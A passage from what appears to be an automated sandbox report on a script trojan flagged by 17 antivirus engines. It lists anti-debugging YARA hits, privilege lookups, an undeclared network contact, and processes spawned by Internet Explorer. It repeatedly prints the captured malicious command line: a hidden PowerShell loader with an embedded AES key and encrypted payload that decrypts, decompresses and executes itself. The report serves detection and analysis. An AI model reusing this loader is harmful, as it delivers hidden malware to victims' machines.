aC2mWVO9Wqzypls5w7UlvzN9bvQJRKWD4s5H9xjy19itsJwchp4WI4Z56oBqaBr75YDcEJuZ52OSZNdWCGATrgjaAYoFveWKoLYO+CVoe6ur/BjxIsVFkbihcMCz713ii0B4pPj+j9GwjuSYhMQPz3Gvjxe6t6kyJahYTh3MoJbLBpTmdWN4IUzXXyWmLBRXAJvN2/XPgzAkWL9GxxfjZd8iqgZVS32nKV8gvnhfVcf4zq3Hf7+OXM0t8Q7VojcuKgVZv0T9GezIQ7pGKBmh6j4LF2AQsyigPyvBWbhXVhTYXSPcAN701ZO7VAWJXn01F1knjEXcA2xIUy7yTx4X5XvY9Ic8B+WrFVnYAmeETknas0YjPJDNKgrU2ZZkDCY16AaXfB+4TVmx9EHFFSVRLFuBYUZ107thxonxzGWE8EmlGzrbg12z2s5IUOXVPZAnir8WfAYRjgTf6yXKoAZraJmEQE7yuzfMqfxYzhkWmNhTQMZ18ez3/USbDmLw4m30V1xHMW+m/GUovmPguRvO9df8eMs0NsZbVJyZ83z2tEL884DHKoIPAoPr86mPdCCW3TS3jYlZfSE2OZYrhhURmStTn4azcFWiW7vOpujNrW4WHXCwbHv65ol1pHmx7rmR0vNeK27chWrruid3JS/eoB0OoE5VVE4OIaCMi7bS0Ll5DcPbhKN/93elO8BNIhHN86dS7RLGnwyrnTHJfGh1TFpyANUEpFA+Aesef6m2wZEa6g1Qu6d67IoyStZaRB7bd1CgCrsTgfbMwJ9FIjXtYeRC2TJyxcHk9925PNj3F4Bc+A5Q4HY+SGZt3nG+2LklMKCR8IlQEcd2V//ObPJ/FWSLv5SPaQ+vQRP8t82R+O3/M2YH5sLSY6hXz22jZjhPOQ56PLx69brVCxFgFPIQruDzGCQunvzpBlp+cMMhxeZLip0CISOowibI+frniOn4VanN7nyQoiPBjKLUqKE1dGsJ8HTMMg8t7uElwm1Z8gOTkATSKAnYyK+pIZeBsbePIL4KtXj1S7dN5dSVlNhlzKsGbWPu9WdHoq1JrgD2DlT//iOdf0ILsfXJDJTlmDTADd0B2MvcrxoRNKCZMicJoznw3cWYeGUUOxqwvQZIxdnYrnGKqLt7JbSbGkfokf+ixbpQVDvzI2/cIYnJ7ZIfdwTbjuWmfBBB5tiu6t4dWXrPCuGgSsUXESsGRDhWNFTUTFLlkVfHbc4GX0TwPGvshqA8rQR6abELMA2e7ejEX+AtKSQW4dbQkTwJiLNL3uYMRKgmnHg3TIn86tYgBTuf9pnj/DIZNw2ZA6YnK3Sbxjb2Q3lz03Dtw63TMR39iBlnjroZakPQz4mggFrkN6am6DF9C0YDkAeO8GErbbZcvTLPkpvsc/vTvoNcS5OUI+kwS2Ix0N57sEf0acciB537tGSuwA/Nq95bH/UFSw1bz724Sj5s7dsQtlHiq5jnKg+G5xhs71YJUzy4Qnn76gpq11VlmxMi8ylQGjCr1Ahzi1ELO4pnarQElXZsqSIINv9nEzl5ulKp9Jbn+EtA85csbB5p7mJtACPWok9a9TpZs/ZwdNwU7oVbYga65enge4QUTldLr0KdjY/3gd186lbzNzuTqrgZXgSymli7tEN6vMTMN/YLCb1Art+uPcM0Pra/GO6yMv7V0GH01Vdbby915wN5EBgTF1qnR82oY5UKnnTov/l3pgIzLdC0lV9147qgHtHdUQPuXPPjPeGb9t2xcw0+NVEBNGg3ZSNkC71pRpm2W99nD71yMw53Lm0uiJHhcTQw9Hz7tASGMtI5R0Ey88DpK43nvQA==';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf \| powershell - filepath: C:\Windows\System32\cmd.exe	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW July 25, 2023, 10:36 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 25, 2023, 10:36 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 25, 2023, 10:36 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3060 CREDAT:145409

Communicates with host for which no DNS query was performed (1 event)

host

117.18.232.200

File has been identified by 17 AntiVirus engines on VirusTotal as malicious (17 events)

ALYac	VBS:Electryon.308
Cyren	VBS/Agent.BCE
Symantec	ISB.Downloader!gen63
ESET-NOD32	VBS/Agent.QVZ
Kaspersky	HEUR:Trojan.Script.Generic
BitDefender	VBS:Electryon.308
MicroWorld-eScan	VBS:Electryon.308
Emsisoft	VBS:Electryon.308 (B)
VIPRE	VBS:Electryon.308
FireEye	VBS:Electryon.308
GData	VBS:Electryon.308
Gridinsoft	Trojan.U.NetSupport.bot
Arcabit	VBS:Electryon.308
Google	Detected
MAX	malware (ai score=89)
Tencent	Script.Trojan.Generic.Qzfl
Fortinet	VBS/Agent.QVZ!tr

A command shell or script process was created by an unexpected parent process (1 event)

parent_process

iexplore.exe

martian_process

powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf | powershell - }

One or more non-whitelisted processes were created (4 events)

parent_process	iexplore.exe	martian_process	powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf \| powershell - }
parent_process	iexplore.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $YmgBp = 'AAAAAAAAAAAAAAAAAAAAAPQl+JCOzpJjaCc4oUUtzD6dtRc5GeY13jTOOYnEVEw9/oEcTlImTTjV3Mz44W6BrbCgvmdbny1MHoQC5+rcpv+sFoXHM3PSehbBHZ2q1IJ8xPaB0q0JwnompfbTkfMVDiE/FBejZH/5RWv3ppRUB09vvxJTAeAvQKDGkEmJ1Aq4HS12m8rPu3v1uQCmZjsP5h1Hi74RrBIpmS+jmJYQRYL+TmPLAAAcY25bybixxvOTLUEz4vf195zo9OIWRYfu8cp26Dqymqh9elUnx0NRTnthnPVmGBJwFO8hNON3RnEP3tQLztYBw/vRUbvTkS77TPkponxnwG05WbkA+88LvgR2OLo0HG+2r7fd7pHeru0vl/qyGl0NB8ajPlq0aCJk9QJosD+3GzT4ZpldSvlGdN3+0BGxyCZBgvHlSwuOEPNSiqdqvSnZq7KgCKU0pc++xhN6blRNhL5gXfOk5AP80Id4FXOuWU80HCGS5CryabRDgmZH/r883LoZIGy+BKgfpEedvCuodGLtTii2aAAHZJBoyD/AcYgYHnNfck2hlTMAFtLs+od+5ow9kEbqARNVXtxn+rFENJnPmhSUQLLwgnN+8deC9CNJaLmANKSMTGJOJ9Pdrm7Z7Dk1L444+v+DzqpXQ9WlAMAKiZMSN1bAVkVZQv/Gla8I7ytIwf58fdPHRJCUERgdJDeg6G2z+zT10r1VDmPSUQBYwUlGO6TWQV5DZIgcjwxzYIZseM79fqqzDr3vS0dbgcYEI6cV4Bbd+1o4B4faQRobFRqzqQEI2HlohIdVcypQuafcoGBSjtOVVsU5sjiSVs0NNmFF2n16b28SGn8C5Vwftpq7JPmOW1CgHR548O34tqf3u3kmWe5ib/gZn5LYb+ZMpmXBHsgHla9uz+lZccTaViTVx23aCl24mulhn7FM09HVESgJO39Ke+WbA+76YoBTNvVZ/Pk4SxygfSxYdUySs7i5xAE/Dj+iroOh3AX3pM0ZtlZV7UcTQZCujIZ9qd/20vXN0pPGUV4Rj9FdRlQa4g5dgTuF58aM45wC5PmWabHXyNnLGAw2MUpgY7o0mmsyIvvyP0Wt6/l0q9eggKINSY2rldzM/CJRszOTv71Lo6egfKV6KJhojjVOOZmY9Ymw6xemtKuOGg+4iLIgzn+Aa6rZGCq5H9WHAkYdsMsSD/2kxiYHO7Id7o6OW0zDrF6c98u0NMrEQeyaAq2fMA00vsue9OIRhZeOSLxo+ziBQwVeNikTfTDOA7Dv2Wtm6BIL8iLZYhUMt4U0vAF69o0WneUjGRcaSWDXkR3Z2kgXxG9oeQjlForA4hx94KQeq6ZCRkkpg4QwN/pjBqpKtiiXOHeqMYVK6F6pURLu+NRK6/ulgXe4xxbEWInDSLHk9025b7LP6fsAvbIy7+8xQSEI1152lYJMk2Jj2LSwfkEA+oLZg9TBKToetYY6EKWfAQAc2p8dQyrmXau7yvSiJjNQ6OEYCoZ2RzCPuZtCApolqhfgOPn5eLQAQGnusW4RoNIhDhjkvGcrewSHkoAoNHG5D+CDt6AMOXiNyJtj9JaA+4csInsmsVBBUisp6j7+8WPXjWmKDCJ7sGEB+a+IVE08brSYnTfX8O7ChyoCIBHhZklWUw9RflJ8gTZbuxHQzPF4RQyJkJhwSLBU3WOlSMsXLWxrnbEU7uZUPvpYfddR8+lMADP9K50l5Vh0a3Mo9vzR9cYjLBBOgpOxf8